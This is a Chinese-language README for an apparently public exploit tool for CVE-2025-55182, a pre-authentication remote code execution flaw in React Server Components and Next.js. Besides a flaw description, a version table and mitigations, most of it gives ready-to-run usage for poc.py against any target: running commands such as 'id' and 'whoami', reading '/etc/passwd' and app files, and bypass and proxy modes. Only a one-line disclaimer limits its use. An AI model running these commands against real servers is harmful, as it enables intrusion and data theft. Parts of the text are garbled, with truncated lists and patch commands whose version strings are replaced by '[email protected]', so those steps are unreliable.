预认证远程代码执行漏洞,影响 React Server Components (RSC)、Next.js 及相关框架。
CVE-2025-55182(又称 React2Shell)是一个影响 React Server Components (RSC) 生态系统的严重预认证 RCE 漏洞。未认证的攻击者只需发送一个精心构造的 HTTP POST 请求即可完全攻陷易受攻击的服务器。
React Server Components 使用一种名为 React Flight 的自定义线格式来序列化函数引用和模块调用。该漏洞存在于处理发往 RSC 端点的 POST 请求的载荷解码机制中。
当服务器接收到 React Flight 载荷时,它会在缺少充分验证的情况下反序列化内容,信任攻击者控制的 $$typeof 字段和模块引用解析。这使得攻击者能够:
child_process、fs、net)$F(函数)类型标记链式调用函数| 组件包 | 受影响版本 | 已修复版本 |
|---|---|---|
react-server-dom-webpack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-parcel | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-turbopack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
next (13.x) | 13.3.0 – 13.5.x | ≥ 14.2.35 |
next (14.x) | 14.0.0 – 14.2.34 | ≥ 14.2.35 |
next (15.x) | 15.0.0+ (详见补丁) | 已修复版本 |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical
id、whoami)。/etc/passwd、package.json)。git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt
使用
基本扫描
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json
通过 OAST 验证 RCE
python3 poc.py -t https://target.com -m verify --oast your.oast.domain
全功能绕过测试
python3 poc.py -t https://target.com -m bypass --verbose
执行命令
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20
读取文件
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"
使用代理(例如 Burp Suite)
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080
文件结构
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
├── __init__.py
├── payloads.py
├── scanner.py
├── bypass.py
└── rce.py
缓解措施
补丁(推荐)
npm install [email protected]
npm install [email protected] [email protected]
临时解决方案
· 禁用服务器函数("use server") · WAF 规则阻止 Content-Type: text/x-component · 对 RSC 端点进行网络隔离
参考资料
· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182
免责声明:仅用于授权安全测试。
作者:SentinelX · https://t.me/SentinelXsecurity